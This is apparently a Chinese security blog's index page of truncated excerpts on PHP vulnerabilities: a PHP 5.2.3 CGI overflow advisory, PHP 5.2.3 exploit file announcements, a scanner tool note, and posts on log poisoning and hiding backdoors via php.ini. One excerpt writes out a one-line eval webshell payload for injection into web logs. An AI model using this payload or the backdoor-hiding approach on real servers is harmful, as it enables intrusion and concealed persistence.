yuange http://hi.baidu.com/yuange1975
影响版本: php5.2.3
不影响版本: 其它版本
php5.2.3在处理CGI的时候,由于一编程错误(缺少括号),错误计算一字符串长度,导致堆缓冲溢出,可能远程执行任意代码。
触发方式:配置.php到php.exe的CGI映射,请求GET /test.php/aa HTTP/1.1
错误发生在php-5.2.3\sapi\cgi\cgi-man.c line 886:
int path_translated_len = ptlen + env_path_info ? strlen(env_path_info) : 0;
程序应该是
int path_translated_len = 阅读全文 »
Tags: CGI,
PHP,
漏洞
作者:GaRY
来源:GaRY's Blog
PHP手册,常看常新:)
记录一下,不错不错
在 Windows 下运行 PHP 时,可以用 Windows 注册表以目录为单位来修改配置。配置值存放于注册表项 HKLM\SOFTWARE\PHP\Per Directory Values 下面,子项对应于路径名。例如对于目录 c:\inetpub\wwwroot 的配置值会存放于 HKLM\SOFTWARE\PHP\Per Directory Values\c\inetpub\wwwroot 项下面。其中的设定对于任何位于此目录及其任何子目录的脚本都有效。项中的值的名称是 PHP 配置指令的名字,值的数据是字符串格式的指令值。值中的 PHP 常量不被解析。不过只有可修改范围是 阅读全文 »
Tags: PHP,
Windows
来源:资安之眼
XSS 及 SQL injection 已成为当前网页应用程式的主要问题,本站也介绍过一些免费的小工具,像是网页程式执行后的 Wapiti 渗透工具,执行中的 PHPIDS 入侵侦测工具,而这次的工具则是执行前的 Pixy原始码检测工具。
Pixy是一套以 Java 开发 PHP 原始码扫描工具,主要用以自动发掘 XSS 及 SQL injection 问题,只要作业系统已安装了Java SE6,解压缩后即可执行,在 run-all.pl (如果你的环境有安装 Perl) 或是 run-all.bat (仅供Windows) 后面接上你的 阅读全文 »
Tags: PHP
鬼仔注:压缩包中有两个文件,分别为
snmp_exploit.php
//PHP <= 5.2.3 snmpget() object id local Buffer Overflow eip overwrite exploit
//by GaRY <wofeiwo_at_gmail_dot_com>
//Based on http://www.milw0rm.com/exploits/4204 by shinnai
//Just change the shellcode
//Tested on xp Pro sp2 cn
tidy_exploit.php
//PHP 5.2.3 tidy_parse_string()
阅读全文 »
Tags: Exploit,
PHP
鬼仔注:有两个版本,一个是milw0rm上的版本,另外一个是茄子宝修改的milw0rm上那个版本的,茄子宝说中文版XPSP2+PHP5.2.3测试成功,加一个用户名和密码为rayh4c管理员。
milw0rm上的:
阅读全文 »
Tags: Exploit,
PHP
来源:茄子乱语
PS:文章说的出错鸟,事后剑心提醒我才发现,有忽悠人的嫌疑,Connection HTTP标头和能不能写入空格无关!!
记得Zizzy写过一篇《关于php包含Apache日志的随想》,这是一个很好的思路,我们可以随意构造
http://www.exp.com/index<?/**/eval($_POST[cmd]);/**/?>.php
这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:
http://www.milw0rm.com/exploits/4029
不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将 阅读全文 »
Tags: PHP,
漏洞
作者:lis0
来源:lis0's Blog
测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2
最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在入侵服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出现了各种隐藏的方法,对于php来说大多是插入<?eval($_POST[a]);? >或者include()函数隐藏然后修改文件时间等等。网上多的很我就不在这罗嗦了。
在我们取得一个服务器的最高权限后我们可以通过修改服务器的配置文件php.ini来达到我们隐藏后门的目的。修改系统目录下面的php.ini文件。在php.ini文件第395-397和第420-424一段
阅读全文 »
Tags: PHP